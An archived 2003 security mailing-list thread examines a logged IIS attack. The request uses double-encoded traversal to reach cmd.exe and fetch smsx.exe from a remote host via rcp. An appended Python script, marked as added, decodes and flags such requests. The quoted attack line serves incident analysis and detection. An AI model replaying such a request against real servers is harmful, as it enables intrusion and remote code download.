smsx.exe is not the Microsoft SMS product, it is probably this:
http://www.superbank.ru/sms/

If you look at the bottom of the features page of this product, it is designed to send lots of SMS messages to hand held devices.
http://www.superbank.ru/sms/SMSexpress.htm

Your would-be attacker is trying to get your machine to download software to send short messages to hand held devices. I have received a couple pieces of spam on my cell phone lately, so I am sensitive to this. Your would-be attacker's motives may be different.

At 02:29 PM 5/5/2003 -0300, Steve Bromwich wrote:
>Hi,
>
>Has anyone seen a request like this in their logs?
>
>205.247.193.56 - - [05/May/2003:11:59:52 -0300]
>"/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+rcp+-b+195.92.252.138.adm:smsx.exe+."
>
>I tried rcping smsx.exe off the remote site but no joy; is the .adm an
>obscure windows-specific port address or something? One of our windows
>guys said the smsx was "remote management software", but had no idea about
>the .adm...
>
>On a side note, the response I got from energis (the 195.92.252.138 owner)
>had the following at the start:
>
>PLEASE NOTE WE ARE CURRENTLY DEALING WITH A 2 WEEK BACKLOG
>
>Further down:
>
>Please note that if one of our IP addresses looks up to a 'webcache' (as
>opposed to a modem) we have a *maximum* of 30 hours to trace the user
>responsible for the abuse.
>
>So I guess this means that Energis users have a pretty good chance of
>abusing remote servers through Energis' web cache and getting away with it
>:-/
>
>Cheers, Steve
>
>----------------------------------------------------------------------------
>Attend Black Hat Briefings & Training Europe, May 12-15 in Amsterdam, the
>world's premier event for IT and network security experts. The two-day
>Training features 6 hand-on courses on May 12-13 taught by professionals.
>The two-day Briefings on May 14-15 features 24 top speakers with no vendor
>sales pitches. Deadline for the best rates is April 25. Register today to
>ensure your place. http://www.securityfocus.com/BlackHat-incidents
>----------------------------------------------------------------------------

**************************************************
Michael J. McCafferty
Principal, Security Engineer
M5 Computer Security
858-576-7325 Voice
http://www.m5computersecurity.com
**************************************************
--- "If you build it, they will hack !" ---
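
Added example, not part of the original thread: a log check that peels the repeated percent-encoding in the quoted request (`%255c` becomes `%5c`, then `\`) and flags the traversal, the shell invocation and the file it tries to fetch. The function names are illustrative, the second sample line is constructed, and the `host.user:file` split assumes the remote-operand syntax documented for the Windows `rcp` command.

```python
import re
from urllib.parse import unquote

# Layout of the quoted log line: client, two fields, [timestamp], "request"
LOG_RE = re.compile(r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] "(?P<req>[^"]*)"')
TRAVERSAL_RE = re.compile(r'\.\.[\\/]')
SHELL_RE = re.compile(r'\b(?:cmd|command)\.(?:exe|com)\b', re.I)
# Assumption: Windows rcp writes a remote operand as host.user:file
RCP_RE = re.compile(r'\brcp\s+(?:-\w\s+)*(?P<host>\S+)\.(?P<user>[^.\s:]+):(?P<file>\S+)')

def decode_layers(value, max_rounds=5):
    """Percent-decode until the text stops changing; return (text, rounds)."""
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote(value)
        if decoded == value:
            break
        value, rounds = decoded, rounds + 1
    return value, rounds

def analyze(line):
    """Return findings for one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = m.group("req").split()
    # Accept both a bare path (as in the thread) and "METHOD path HTTP/x"
    target = parts[1] if len(parts) == 3 and parts[2].startswith("HTTP/") else m.group("req")
    path, _, query = target.partition("?")
    path, rounds = decode_layers(path)
    flags = []
    if TRAVERSAL_RE.search(path):
        flags.append("traversal")
    if rounds > 1:  # more than one encoding layer is not normal client behaviour
        flags.append("multi-encoded")
    if SHELL_RE.search(path):
        flags.append("shell")
    command = unquote(query.replace("+", " ")) if "shell" in flags else ""
    fetch = RCP_RE.search(command)
    return {"client": m.group("client"), "path": path, "flags": flags,
            "command": command, "fetch": fetch.groupdict() if fetch else None}

# First line is the request quoted in the thread; the second is constructed.
SAMPLES = [
    '205.247.193.56 - - [05/May/2003:11:59:52 -0300] '
    '"/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+rcp+-b+195.92.252.138.adm:smsx.exe+."',
    '192.0.2.10 - - [05/May/2003:12:00:01 -0300] "GET /docs/a%20b.html HTTP/1.0"',
]
```
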
This archive was generated by hypermail 2b30 : Tue May 06 2003 - 10:45:33 PDT